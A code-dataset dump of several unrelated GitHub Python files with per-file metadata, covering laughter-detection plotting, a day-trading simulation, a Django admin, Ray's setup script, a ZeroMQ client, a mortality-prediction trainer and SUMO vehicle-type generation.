:param true_segment_list: list of groundtruth timecodes.
:param pred_segment_list: list of predicted timecodes.
:param t_min: timecode from which starting the timeline.
:param t_max: timecode to which ending the timeline.
:param zoom: wether to display the diagram in a "zoom" fashion or not
(ie: with details, the timeline should be short).
:param marker_list: list of markers to add on the diagram (gray lines).
"""
true_segment_list = sorted(true_segment_list)
pred_segment_list = sorted(pred_segment_list)
x_max = max(true_segment_list[-1][-1], pred_segment_list[-1][-1])
t_min = 0 if not t_min else t_min
t_max = x_max if not t_max else t_max
true_segment_list = [
[t1, t2]
for t1, t2 in true_segment_list
if (t1 >= t_min) and (t2 <= t_max)
]
pred_segment_list = [
[t1, t2]
for t1, t2 in pred_segment_list
if (t1 >= t_min) and (t2 <= t_max)
]
plt.figure(figsize=(20, 5))
prev_x_min = t_min
for x_min, x_max in true_segment_list:
if zoom:
plt.vlines(x_min, 1, 2, color="#e41a1c", linestyles="dashed")
plt.vlines(x_max, 1, 2, color="#e41a1c", linestyles="dashed")
plt.fill_between([x_min, x_max], 1, 2, color="#e41a1c", alpha=0.1)
plt.hlines(
1,
prev_x_min,
x_min,
color="black",
linewidth=2,
linestyles="dashed",
)
plt.hlines(1, x_min, x_max, color="#e41a1c", linewidth=4)
prev_x_min = x_max
plt.hlines(
1, x_max, t_max, color="black", linewidth=2, linestyles="dashed"
)
prev_x_min = t_min
for x_min, x_max in pred_segment_list:
if zoom:
plt.vlines(x_min, 1, 2, color="#377eb8", linestyles="dashed")
plt.vlines(x_max, 1, 2, color="#377eb8", linestyles="dashed")
plt.fill_between([x_min, x_max], 1, 2, color="#377eb8", alpha=0.1)
plt.hlines(
2,
prev_x_min,
x_min,
color="black",
linewidth=2,
linestyles="dashed",
)
plt.hlines(2, x_min, x_max, color="#377eb8", linewidth=4)
prev_x_min = x_max
plt.hlines(
2, x_max, t_max, color="black", linewidth=2, linestyles="dashed"
)
if marker_list is not None:
marker_list = [t for t in marker_list if (t >= t_min) and (t <= t_max)]
for timecode in marker_list:
plt.vlines(timecode, 1, 2, color="#000000")
pred_legend = mpatches.Patch(color="#e41a1c", label="pred")
true_legend = mpatches.Patch(color="#377eb8", label="true")
plt.legend(handles=[pred_legend, true_legend], loc=6)
plt.show()
def load_labels(label_path: str) -> List[Tuple[float, float]]:
"""Load a Friends label file and extract laugther timecodes."""
labels = pickle.load(open(label_path, "rb"))
true_timecodes = []
for segment in labels.values():
if segment[-1][-10:-2].lower() == "laughter":
true_timecodes.append(segment[:2])
return sorted(true_timecodes)
def load_preds(pred_path: str) -> List[Tuple[float, float]]:
"""Load a prediction file with laugther timecodes."""
preds = pickle.load(open(pred_path, "rb"))
return sorted(preds)
| robincourant/FunnyNet | laughter_detection/core/utils.py | utils.py | py | 3,805 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "typing.List",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"line_number": ... |
6998246271 | from csv import DictReader
from glob import glob
from random import choices
from datetime import date
import numpy as np
import matplotlib.pyplot as plt
from statistics import mean
from dataclasses import dataclass
'''
for traders with less than 25k in their brokerage accounts, three day trades are allowed per five day rolling period
this means, in effect, that three day trades are allowed per week as long as they are performed on the same days each week
Which days?
I will rule out Mondays since many market holidays fall on Mondays
The number of market holidays falling on each day are:
Monday: 19
Tuesday: 1
Wednesday: 2
Thursday: 3
Friday: 3
So, Tuesdays and Wednesdays are in.
Fridays have shortened days each November on black friday.
So, if day trading on exactly the same three weekdays each week, it seems that Tuesday, Wednesday, and Thursday are optimal.
For traders with 25k or more in their brokerage accounts, it would seem that there is no limitation on number of day trades.
'''
csv_files = glob('./data-files/**/*.csv')
quotes = {}
@dataclass
class Quote:
open_price: float
high_price: float
close_price: float
trade_date: date
for csv_file in csv_files:
with open(csv_file, newline='') as f:
quote_reader = DictReader(f)
quote = []
for row in quote_reader:
trade_date = date.fromisoformat(row['Date'])
if trade_date.weekday() in (1, 2, 3):
try:
quote.append(Quote(float(row['Open']), float(row['High']), float(row['Close']), trade_date))
except:
print(csv_file)
print(row)
if (len(quote) != 155):
print(csv_file)
print(len(quote))
else:
quotes[csv_file.split('.')[1].split('\\')[2]] = quote
# sample_symbol = 'INDB'
trading_days = 155
simulation_size = 500000
# targets = [{ 'target': 1.005 + 0.0000005 * i, 'running total': [1000.0 for _ in range(simulation_size)] } for i in range(10000)]
# print(len([quotes[equity] for equity in quotes.keys()]))
running_totals = [1000.0 for _ in range(simulation_size)]
target = 1.008778
print(len(quotes.keys()))
for i in range(trading_days):
equities = choices([key for key in quotes.keys()], k=simulation_size)
for (j, equity) in enumerate(equities):
quote = quotes[equity][i]
entry_price = quote.open_price
position_entry_shares = running_totals[j] / entry_price
target_price = entry_price * target
if target_price <= quote.high_price:
position_exit = position_entry_shares * target_price
else:
position_exit = position_entry_shares * quote.close_price
if position_exit > 500:
# regulatory transaction fee
position_exit -= position_exit * 22.9 / 1000000.0
if position_entry_shares > 50:
# trading activity fee
position_exit -= 0.00013 * position_entry_shares
running_totals[j] = position_exit
# print(sorted(running_totals))
print(f'less than 700: {len([x for x in running_totals if x < 700])}')
print(f'at least 700 and less than 800: {len([x for x in running_totals if x >= 700 and x < 800])}')
print(f'at least 800 and less than 900: {len([x for x in running_totals if x >= 800 and x < 900])}')
print(f'at least 900 and less than 1000: {len([x for x in running_totals if x >= 900 and x < 1000])}')
print(f'at least 1000 and less than 1100: {len([x for x in running_totals if x >= 1000 and x < 1100])}')
print(f'at least 1100 and less than 1200: {len([x for x in running_totals if x >= 1100 and x < 1200])}')
print(f'at least 1200 and less than 1300: {len([x for x in running_totals if x >= 1200 and x < 1300])}')
print(f'at least 1300 and less than 1400: {len([x for x in running_totals if x >= 1300 and x < 1400])}')
print(f'at least 1400: {len([x for x in running_totals if x >= 1400])}')
'''
x = [st['target'] for st in targets]
y = [mean(st['running total']) for st in targets]
plt.scatter(x, y)
plt.show()
'''
| joshparkerj/day-trader | simulate.py | simulate.py | py | 3,898 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "glob.glob",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "dataclasses.dataclass",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "csv.DictReader",
"l... |
19271398173 | # coding=utf-8
from __future__ import unicode_literals
from django.contrib import admin
from django.http import HttpResponseRedirect
from django.conf.urls import url
from django.utils.html import format_html
from django.core.urlresolvers import reverse
from ordered_model.admin import OrderedModelAdmin
from monitoreo.apps.dashboard.models import IndicatorType, TableColumn
from monitoreo.apps.dashboard.admin.utils import switch
@admin.register(TableColumn)
class TableColumnAdmin(OrderedModelAdmin):
list_display = ('full_name', 'move_up_down_links')
@admin.register(IndicatorType)
class IndicatorTypeAdmin(OrderedModelAdmin):
list_display = ('nombre', 'order', 'resumen', 'mostrar',
'series_red', 'series_nodos', 'series_federadores',
'panel_red', 'panel_nodos', 'panel_federadores',
'move_up_down_links', 'position_actions')
list_filter = ('resumen', 'mostrar')
actions = ('queryset_to_top', 'queryset_to_bottom',
'summarize', 'desummarize',
'show', 'hide',
'add_to_aggregated_series', 'remove_from_aggregated_series',
'add_to_nodes_series', 'remove_from_nodes_series',
'add_to_indexing_series', 'remove_from_indexing_series',
'add_to_aggregated_panel', 'remove_from_aggregated_panel',
'add_to_nodes_panel', 'remove_from_nodes_panel',
'add_to_federators_panel', 'remove_from_federators_panel'
)
def get_urls(self):
urls = super(IndicatorTypeAdmin, self).get_urls()
extra_urls = [url(r'^(?P<model_id>.+)/(?P<direction>top|bottom)/$',
self.order_move, name='order_move'), ]
return extra_urls + urls
def position_actions(self, obj):
return format_html(
'<a class="button" href="{}">Tope</a> '
'<a class="button" href="{}">Fondo</a>',
reverse('admin:order_move', args=[obj.pk, 'top']),
reverse('admin:order_move', args=[obj.pk, 'bottom']),
)
position_actions.short_description = 'Posicionamientos'
position_actions.allow_tags = True
def order_move(self, request, model_id, direction):
indicator_type = IndicatorType.objects.get(pk=model_id)
if direction == 'top':
indicator_type.top()
elif direction == 'bottom':
indicator_type.bottom()
indicator_type.save()
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
summarize = switch({'resumen': True})
summarize.short_description = 'Agregar al resumen'
desummarize = switch({'resumen': False})
desummarize.short_description = 'Quitar del resumen'
show = switch({'mostrar': True})
show.short_description = 'Agregar al reporte'
hide = switch({'mostrar': False})
hide.short_description = 'Quitar del reporte'
add_to_aggregated_series = switch({'series_red': True})
add_to_aggregated_series.short_description =\
'Agregar a las series de tiempo de red'
remove_from_aggregated_series = switch({'series_red': False})
remove_from_aggregated_series.short_description =\
'Quitar de las series de tiempo de red'
add_to_nodes_series = switch({'series_nodos': True})
add_to_nodes_series.short_description = \
'Agregar a las series de tiempo de nodos'
remove_from_nodes_series = switch({'series_nodos': False})
remove_from_nodes_series.short_description = \
'Quitar de las series de tiempo de nodos'
add_to_indexing_series = switch({'series_federadores': True})
add_to_indexing_series.short_description = \
'Agregar a las series de tiempo de nodos federadores'
remove_from_indexing_series = switch({'series_federadores': False})
remove_from_indexing_series.short_description = \
'Quitar de las series de tiempo de nodos federadores'
add_to_aggregated_panel = switch({'panel_red': True})
add_to_aggregated_panel.short_description = \
'Agregar al panel de indicadores de red'
remove_from_aggregated_panel = switch({'panel_red': False})
remove_from_aggregated_panel.short_description = \
'Quitar del panel de indicadores de red'
add_to_nodes_panel = switch({'panel_nodos': True})
add_to_nodes_panel.short_description = \
'Agregar al panel de indicadores de nodos'
remove_from_nodes_panel = switch({'panel_nodos': False})
remove_from_nodes_panel.short_description = \
'Quitar del panel de indicadores de nodos'
add_to_federators_panel = switch({'panel_federadores': True})
add_to_federators_panel.short_description = \
'Agregar al panel de indicadores de nodos federadores'
remove_from_federators_panel = switch({'panel_federadores': False})
remove_from_federators_panel.short_description = \
'Quitar del panel de indicadores de nodos federadores'
| datosgobar/monitoreo-apertura | monitoreo/apps/dashboard/admin/indicator_types.py | indicator_types.py | py | 4,952 | python | en | code | 5 | github-code | 6 | [
{
"api_name": "ordered_model.admin.OrderedModelAdmin",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "django.contrib.admin.register",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "monitoreo.apps.dashboard.models.TableColumn",
"line_number": 16,
"usa... |
18227651268 |
from flask import Flask, render_template, session, request, url_for, redirect, flash
app = Flask(__name__)
@app.route("/")
def hello():
print ("hello there")
return render_template("home.html")
if __name__ == "__main__":
app.debug = True
app.run()
| TimMarder/determinants--marderT_canaleB_liuA_hasanA | app.py | app.py | py | 269 | python | en | code | 2 | github-code | 6 | [
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 9,
"usage_type": "call"
}
] |
38679091876 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import subprocess
import sys
from setuptools import setup, find_packages, Distribution
import setuptools.command.build_ext as _build_ext
# Ideally, we could include these files by putting them in a
# MANIFEST.in or using the package_data argument to setup, but the
# MANIFEST.in gets applied at the very beginning when setup.py runs
# before these files have been created, so we have to move the files
# manually.
ray_files = [
"ray/core/src/common/thirdparty/redis/src/redis-server",
"ray/core/src/common/redis_module/libray_redis_module.so",
"ray/core/src/plasma/plasma_store",
"ray/core/src/plasma/plasma_manager",
"ray/core/src/local_scheduler/local_scheduler",
"ray/core/src/local_scheduler/liblocal_scheduler_library.so",
"ray/core/src/global_scheduler/global_scheduler",
"ray/WebUI.ipynb"
]
optional_ray_files = []
ray_ui_files = [
"ray/core/src/catapult_files/index.html",
"ray/core/src/catapult_files/trace_viewer_full.html"
]
ray_autoscaler_files = [
"ray/autoscaler/aws/example-full.yaml"
]
# The UI files are mandatory if the INCLUDE_UI environment variable equals 1.
# Otherwise, they are optional.
if "INCLUDE_UI" in os.environ and os.environ["INCLUDE_UI"] == "1":
ray_files += ray_ui_files
else:
optional_ray_files += ray_ui_files
optional_ray_files += ray_autoscaler_files
extras = {
"rllib": [
"tensorflow", "pyyaml", "gym[atari]", "opencv-python",
"python-snappy", "scipy"]
}
class build_ext(_build_ext.build_ext):
def run(self):
# Note: We are passing in sys.executable so that we use the same
# version of Python to build pyarrow inside the build.sh script. Note
# that certain flags will not be passed along such as --user or sudo.
# TODO(rkn): Fix this.
subprocess.check_call(["../build.sh", sys.executable])
# We also need to install pyarrow along with Ray, so make sure that the
# relevant non-Python pyarrow files get copied.
pyarrow_files = [
os.path.join("ray/pyarrow_files/pyarrow", filename)
for filename in os.listdir("./ray/pyarrow_files/pyarrow")
if not os.path.isdir(os.path.join("ray/pyarrow_files/pyarrow",
filename))]
files_to_include = ray_files + pyarrow_files
for filename in files_to_include:
self.move_file(filename)
# Copy over the autogenerated flatbuffer Python bindings.
generated_python_directory = "ray/core/generated"
for filename in os.listdir(generated_python_directory):
if filename[-3:] == ".py":
self.move_file(os.path.join(generated_python_directory,
filename))
# Try to copy over the optional files.
for filename in optional_ray_files:
try:
self.move_file(filename)
except Exception as e:
print("Failed to copy optional file {}. This is ok."
.format(filename))
def move_file(self, filename):
# TODO(rkn): This feels very brittle. It may not handle all cases. See
# https://github.com/apache/arrow/blob/master/python/setup.py for an
# example.
source = filename
destination = os.path.join(self.build_lib, filename)
# Create the target directory if it doesn't already exist.
parent_directory = os.path.dirname(destination)
if not os.path.exists(parent_directory):
os.makedirs(parent_directory)
print("Copying {} to {}.".format(source, destination))
shutil.copy(source, destination)
class BinaryDistribution(Distribution):
def has_ext_modules(self):
return True
setup(name="ray",
# The version string is also in __init__.py. TODO(pcm): Fix this.
version="0.3.1",
packages=find_packages(),
cmdclass={"build_ext": build_ext},
# The BinaryDistribution argument triggers build_ext.
distclass=BinaryDistribution,
install_requires=["numpy",
"funcsigs",
"click",
"colorama",
"psutil",
"pytest",
"pyyaml",
"redis",
# The six module is required by pyarrow.
"six >= 1.0.0",
"flatbuffers"],
setup_requires=["cython >= 0.23"],
extras_require=extras,
entry_points={"console_scripts": ["ray=ray.scripts.scripts:main"]},
include_package_data=True,
zip_safe=False,
license="Apache 2.0")
| ray-project/sandbox | python/setup.py | setup.py | py | 4,842 | python | en | code | 4 | github-code | 6 | [
{
"api_name": "os.environ",
"line_number": 42,
"usage_type": "attribute"
},
{
"api_name": "setuptools.command.build_ext.build_ext",
"line_number": 56,
"usage_type": "attribute"
},
{
"api_name": "setuptools.command.build_ext",
"line_number": 56,
"usage_type": "name"
},
... |
42688926971 | import logging
import time
import uuid
from queue import Queue
from threading import Event, Thread
import zmq
class ControlClient(Thread):
def __init__(self, port: int):
super(ControlClient, self).__init__()
self.daemon = True
self.command_queue = Queue()
self.command_return = {}
self.command_return_popque = Queue()
self.context = zmq.Context()
self.socket = self.context.socket(zmq.REQ)
self.port = port
self.timeout = 5000
self.active = Event()
def execute_command(self, device, command, args, kwargs, id=None):
self.socket.send_json([device, command, args, kwargs])
if (self.socket.poll(self.timeout) & zmq.POLLIN) != 0:
status, retval = self.socket.recv_json()
if status == "OK":
return retval
else:
logging.warning(
f"{device} networking warning in "
+ f"ExecuteNetworkCommand : error for {command} -> {retval}"
)
return "Error"
def run(self):
self.socket.connect(f"tcp://localhost:{self.port}")
while self.active.is_set():
while not self.command_queue.empty():
id, device, command, args, kwargs = self.command_queue.get()
ret = self.execute_command(device, command, args, kwargs)
self.command_return[id] = ret
while not self.command_return_popque.empty():
self.command_return.pop(self.command_return_popque.get())
time.sleep(1e-6)
def send_command(
control_client: ControlClient, device, command, args, kwargs, wait_return=False
):
id = uuid.uuid1().int >> 64
control_client.command_queue.put([id, device, command, args, kwargs])
if wait_return:
while True:
if id in control_client.command_return:
ret = control_client.command_return.pop(id)
return ret
time.sleep(1e-6)
else:
control_client.command_return_popque.put(id)
return
| ograsdijk/CeNTREX-compressorcabinet | centrex_compressorcabinet/networking/controller_client.py | controller_client.py | py | 2,107 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "threading.Thread",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "queue.Queue",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "queue.Queue",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "zmq.Context",
"line_numb... |
16179638713 | import os
import torch
import wandb
import argparse
import numpy as np
import pandas as pd
from sklearn.model_selection import StratifiedKFold
from sklearn.experimental import enable_iterative_imputer
from sklearn.impute import IterativeImputer
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix, roc_auc_score, average_precision_score, balanced_accuracy_score
os.environ["CUDA_DEVICE_ORDER"] = 'PCI_BUS_ID'
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--layer_1', help='layer 1 size', type=int, default=50, required=True)
parser.add_argument(
'--layer_2', help='layer 2 size', type=int, default=50, required=True)
parser.add_argument(
'--layer_3', help='layer 3 size', type=int, default=50, required=True)
parser.add_argument(
'--lr', help='Learning Rate', type=float, default=0.01, required=True)
parser.add_argument(
'--weight_decay', help='Weight Decay', type=float, default=0.9, required=True)
parser.add_argument(
'--momentum', help='Weight Decay', type=float, default=0.9, required=True)
parser.add_argument(
'--no_epoch', help='Number of Epochs', type=int, default=1000, required=True)
args = parser.parse_args()
return args
class Model(torch.nn.Module):
def __init__(self, layer_1, layer_2, layer_3):
super(Model, self).__init__()
self.lin1 = torch.nn.Linear(12, layer_1)
self.lin2 = torch.nn.Linear(layer_1, layer_2)
self.lin3 = torch.nn.Linear(layer_2, layer_3)
self.lin4 = torch.nn.Linear(layer_3, 1)
self.selu = torch.nn.SELU()
def forward(self, x):
x = self.selu(self.lin1(x))
x = self.selu(self.lin2(x))
x = self.selu(self.lin3(x))
x = self.lin4(x)
return x
def load_data():
cd = os.getcwd()
x_eicu = pd.read_csv(cd+'../data/x_eicu.csv')
y_eicu = pd.read_csv(cd+'../data/y_eicu.csv')
mimic = pd.read_csv(cd+'../data/mimic.csv')
assert np.all(x_eicu['patientunitstayid'].to_numpy() == y_eicu['patientunitstayid'].to_numpy())
feature_list = ['lactate', 'oobventday1', 'eyes', 'motor', 'verbal', 'albumin_x',
'age', 'creatinine_x', 'BUN', 'PT - INR', 'WBC x 1000', 'meanbp']
feature_list_mimic = ['Lactate', 'firstdayvent', 'gcseyes', 'gcsmotor', 'gcsverbal', 'Albumin',
'Age', 'Creatinine', 'BUN', 'INR', 'WBC', 'MAP']
x_eicu = x_eicu[feature_list].to_numpy()
y_eicu = y_eicu['actualicumortality'].to_numpy()
x_mimic = mimic[feature_list_mimic].to_numpy()
y_mimic = mimic['Mortality'].to_numpy()
x = np.vstack((x_eicu, x_mimic))
y = np.hstack((y_eicu, y_mimic))
return x, y
def main():
wandb.init(project='mortality-tool-newfeats')
args = parse_args()
x, y = load_data()
kfold = StratifiedKFold(n_splits=10)
logits_all = []
labels_all = []
counter = 1
for train_index, test_index in kfold.split(x, y):
x_train, y_train = x[train_index], y[train_index]
x_test, y_test = x[test_index], y[test_index]
imputer = IterativeImputer()
scaler = StandardScaler()
x_train = scaler.fit_transform(imputer.fit_transform(x_train))
x_test = scaler.transform(imputer.transform(x_test))
x_train, y_train = torch.from_numpy(x_train).float().to('cuda:0'), torch.from_numpy(y_train).float().to('cuda:0')
model = Model(args.layer_1, args.layer_2, args.layer_3)
criterion = torch.nn.BCEWithLogitsLoss(pos_weight=torch.tensor([14.80], device='cuda:0'))
optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, weight_decay=args.weight_decay, momentum=args.momentum, nesterov=True)
model.train()
model.to('cuda:0')
for epoch in range(args.no_epoch):
optimizer.zero_grad()
outputs = model.forward(x_train)
loss = criterion(outputs, y_train.view(-1, 1))
loss.backward()
optimizer.step()
model.eval()
outputs = model.forward(torch.from_numpy(x_test).float().to('cuda:0'))
logits = torch.sigmoid(outputs).detach().cpu().numpy()
logits_all.append(logits.reshape(-1))
labels_all.append(y_test)
print('Iter {}/10 done'.format(counter))
counter += 1
logits_all = np.hstack(logits_all)
labels_all = np.hstack(labels_all)
tn, fp, fn, tp = confusion_matrix(labels_all, np.round(logits_all)).ravel()
accuracy = (tp + tn) / (tp + tn + fp + fn)
precision = tp / (tp + fp)
sensitivity = tp / (tp + fn)
specificity = tn / (tn + fp)
roc_auc = roc_auc_score(labels_all, logits_all)
prc_auc = average_precision_score(labels_all, logits_all)
balanced_acc = balanced_accuracy_score(labels_all, np.round(logits_all))
pos_likelihood_ratio = sensitivity / (1 - specificity)
neg_likelihood_ratio = (1 - sensitivity) / specificity
class_names = ['ALIVE', 'EXPIRED']
wandb.log({'accuracy': accuracy, 'precision': precision, 'sensitivity': sensitivity, 'specificitiy': specificity,
'roc_auc': roc_auc, 'prc_auc': prc_auc, 'balanced_accuracy': balanced_acc,
'neg_likelihood_ratio': neg_likelihood_ratio, 'pos_likelihood_ratio': pos_likelihood_ratio})
if __name__ == '__main__':
main()
| jrepifano/mortality-tool | wandb_training/d_train_wandb.py | d_train_wandb.py | py | 5,410 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "os.environ",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.nn",
... |
8385089331 | from __future__ import absolute_import
import os
import sys
import re
import xml.dom.minidom
import random
from sumolib.files.additional import write_additional_minidom
try:
from typing import Any, List, Tuple, Union
except ImportError:
# there are python2 versions on MacOS coming without typing
pass
"""
Creates a vehicle type distribution with a number of representative car-following parameter sets.
"""
class _FixDistribution(object):
def __init__(self, params, isNumeric=True):
if isNumeric:
self._params = tuple([float(p) for p in params])
else:
self._params = params
self._limits = (0, None)
self._isNumeric = isNumeric
self._maxSampleAttempts = 10
def setMaxSamplingAttempts(self, n):
if n is not None:
self._maxSampleAttempts = n
def setLimits(self, limits):
self._limits = limits
def sampleValue(self):
if self._isNumeric:
value = None
nrSampleAttempts = 0
# Sample until value falls into limits
while nrSampleAttempts < self._maxSampleAttempts \
and (value is None or (self._limits[1] is not None and value > self._limits[1]) or
(self._limits[0] is not None and value < self._limits[0])):
value = self._sampleValue()
nrSampleAttempts += 1
# Eventually apply fallback cutting value to limits
if self._limits[0] is not None and value < self._limits[0]:
value = self._limits[0]
elif self._limits[1] is not None and value > self._limits[1]:
value = self._limits[1]
else:
value = self._sampleValue()
return value
def sampleValueString(self, decimalPlaces):
if self._isNumeric:
decimalPattern = "%." + str(decimalPlaces) + "f"
return decimalPattern % self.sampleValue()
return self.sampleValue()
def _sampleValue(self):
return self._params[0]
class _NormalDistribution(_FixDistribution):
def __init__(self, mu, sd):
_FixDistribution.__init__(self, (mu, sd))
def _sampleValue(self):
return random.normalvariate(self._params[0], self._params[1])
class _LogNormalDistribution(_FixDistribution):
def __init__(self, mu, sd):
_FixDistribution.__init__(self, (mu, sd))
def _sampleValue(self):
return random.lognormvariate(self._params[0], self._params[1])
class _NormalCappedDistribution(_FixDistribution):
def __init__(self, mu, sd, min, max):
_FixDistribution.__init__(self, (mu, sd, min, max))
if mu < min or mu > max:
raise Exception("mean %s is outside cutoff bounds [%s, %s]" % (mu, min, max))
def _sampleValue(self):
while True:
cand = random.normalvariate(self._params[0], self._params[1])
if cand >= self._params[2] and cand <= self._params[3]:
return cand
class _UniformDistribution(_FixDistribution):
def __init__(self, a, b):
_FixDistribution.__init__(self, (a, b))
def _sampleValue(self):
return random.uniform(self._params[0], self._params[1])
class _GammaDistribution(_FixDistribution):
def __init__(self, alpha, beta):
_FixDistribution.__init__(self, (alpha, 1.0 / beta))
def _sampleValue(self):
return random.gammavariate(self._params[0], self._params[1])
_DIST_DICT = {
'normal': _NormalDistribution,
'lognormal': _LogNormalDistribution,
'normalCapped': _NormalCappedDistribution,
'uniform': _UniformDistribution,
'gamma': _GammaDistribution
}
class VehAttribute:
def __init__(self, name, is_param=False, distribution=None, distribution_params=None,
bounds=None, attribute_value=None):
# type: (str, bool, str, Union[dict, Any], tuple, str) -> None
"""
This emmulates one line of example config.txt in
https://sumo.dlr.de/docs/Tools/Misc.html#createvehtypedistributionpy
Either distribution or attribute_value should be populated
Args:
name (str): the name of the attribute. Examples: "tau", "sigma", "length"
is_param (bool, optional): is the attribute a parameter that should be added as a child element.
distribution (str, optional): the name of the distribution to use ()
distribution_params (Union[dict, Any], optional): the parameters corresponding to the distribution
bounds (tuple, optional): the bounds of the distribution.
attribute_value (str, optional): if no distribution is given, the fixed value for the attribute
"""
self.is_param = is_param
self.name = name
self.distribution = distribution
self.distribution_params = distribution_params
self.bounds = bounds
self.attribute_value = attribute_value
if self.attribute_value and self.distribution:
raise Exception("Only one of distribution or attribute value should be defined, not both")
self.d_obj = self._dist_helper(distribution, distribution_params, bounds)
def _dist_helper(self, distribution, dist_params, dist_bounds):
# type: (...) -> Union[None, _FixDistribution]
if distribution:
try:
d = _DIST_DICT[distribution](**dist_params)
d.setLimits(dist_bounds) if dist_bounds else d.setLimits(
(0, None))
except KeyError:
raise KeyError("The distribution %s is not known. Please select one of: \n%s " %
(distribution, "\n".join(_DIST_DICT.keys())))
else:
isNumeric = False if self.name == "emissionClass" else len(
re.findall(r'^(-?[0-9]+(\.[0-9]+)?)$', self.attribute_value)) > 0
d = _FixDistribution((self.attribute_value, ), isNumeric)
return d
def add_sampling_attempts(self, attempts):
if self.d_obj:
self.d_obj.setMaxSamplingAttempts(attempts)
class CreateVehTypeDistribution:
def __init__(self, seed=None, size=100, name='vehDist', resampling=100, decimal_places=3):
# type: (int, int, str, int, int) -> None
"""
Creates a VehicleType Distribution.
See https://sumo.dlr.de/docs/Definition_of_Vehicles,_Vehicle_Types,_and_Routes.html#vehicle_type_distributions
Args:
seed (int, optional): random seed.
size (int, optional): number of vTypes in the distribution.
name (str, optional): alphanumerical ID used for the created vehicle type distribution.
resampling (int, optional): number of attempts to resample a value until it lies in the specified bounds.
decimal_places (int, optional): number of decimal places.
"""
if seed:
random.seed(seed)
self.size = size
self.name = name
self.resampling = resampling
self.decimal_places = decimal_places
self.attributes = [] # type: List[VehAttribute]
def add_attribute(self, attribute):
# type: (Union[VehAttribute, dict]) -> None
"""
Add an instance of the attribute class to the Parameters. Pass the sampling attempts "global" parameter
Args:
attribute (VehAttribute or dict): An instance of VehAttribute or
a dictionary of parameters to be passed to the VehAttribute constructor
"""
attribute = attribute if isinstance(attribute, VehAttribute) else VehAttribute(**attribute)
attribute.add_sampling_attempts(self.resampling)
self.attributes.append(attribute)
def create_veh_dist(self, xml_dom):
# type: (xml.dom.minidom.Document) -> xml.dom.minidom.Element
# create the vehicleDist node
vtype_dist_node = xml_dom.createElement("vTypeDistribution")
vtype_dist_node.setAttribute("id", self.name)
# create the vehicle types
for i in range(self.size):
veh_type_node = xml_dom.createElement("vType")
veh_type_node.setAttribute("id", self.name + str(i))
self._generate_vehType(xml_dom, veh_type_node)
vtype_dist_node.appendChild(veh_type_node)
return vtype_dist_node
def to_xml(self, file_path):
# type: (str) -> None
xml_dom, existing_file = self._check_existing(file_path)
vtype_dist_node = self.create_veh_dist(xml_dom)
if existing_file:
self._handle_existing(xml_dom, vtype_dist_node)
with open(file_path, 'w') as f:
dom_string = xml_dom.toprettyxml()
# super annoying but this makes re-writing the xml a little bit prettier
f.write(os.linesep.join([s for s in dom_string.splitlines() if s.strip()]))
else:
write_additional_minidom(xml_dom, vtype_dist_node, file_path=file_path)
sys.stdout.write("Output written to %s" % file_path)
def _handle_existing(self, xml_dom, veh_dist_node):
# type: (xml.dom.minidom.Document, xml.dom.minidom.Element) -> None
existingDistNodes = xml_dom.getElementsByTagName("vTypeDistribution")
replaceNode = None
for existingDistNode in existingDistNodes:
if existingDistNode.hasAttribute("id") and existingDistNode.getAttribute("id") == self.name:
replaceNode = existingDistNode
break
if replaceNode is not None:
replaceNode.parentNode.replaceChild(veh_dist_node, replaceNode)
else:
xml_dom.documentElement.appendChild(veh_dist_node)
def _generate_vehType(self, xml_dom, veh_type_node):
# type: (xml.dom.minidom.Document, xml.dom.minidom.Element) -> xml.dom.minidom.Node
for attr in self.attributes:
if attr.is_param:
param_node = xml_dom.createElement("param")
param_node.setAttribute("key", attr.name)
param_node.setAttribute(
"value", attr.d_obj.sampleValueString(self.decimal_places))
veh_type_node.appendChild(param_node)
else:
veh_type_node.setAttribute(
attr.name, attr.d_obj.sampleValueString(self.decimal_places))
@staticmethod
def _check_existing(file_path):
# type: (str) -> Tuple[xml.dom.minidom.Document, bool]
if os.path.exists(file_path):
try:
return xml.dom.minidom.parse(file_path), True
except Exception as e:
raise Exception("Cannot parse existing %s. Error: %s" %
(file_path, str(e)))
else:
return xml.dom.minidom.Document(), False
def save_myself(self, file_path):
# type: (str) -> None
"""
This function saves the class to a json format. Used for logging simulation inputs
Args:
file_path (str): path to save json to
"""
import json
with open(file_path, "w") as f:
f.write(
json.dumps(
self,
default=lambda o: {
key: param for key, param in o.__dict__.items() if '_' not in key[0]},
sort_keys=True,
indent=4,
)
)
class CreateMultiVehTypeDistributions(CreateVehTypeDistribution):
def __init__(self):
# type: () -> None
self.distributions = [] # type: List[CreateVehTypeDistribution]
def register_veh_type_distribution(self, veh_type_dist, veh_attributes):
# type: (Union[dict, CreateVehTypeDistribution], List[Union[dict, VehAttribute]]) -> None
veh_type_dist = veh_type_dist if isinstance(
veh_type_dist, CreateVehTypeDistribution) else CreateVehTypeDistribution(**veh_type_dist)
for attr in veh_attributes:
veh_type_dist.add_attribute(attr if isinstance(attr, VehAttribute) else VehAttribute(**attr))
self.distributions.append(veh_type_dist)
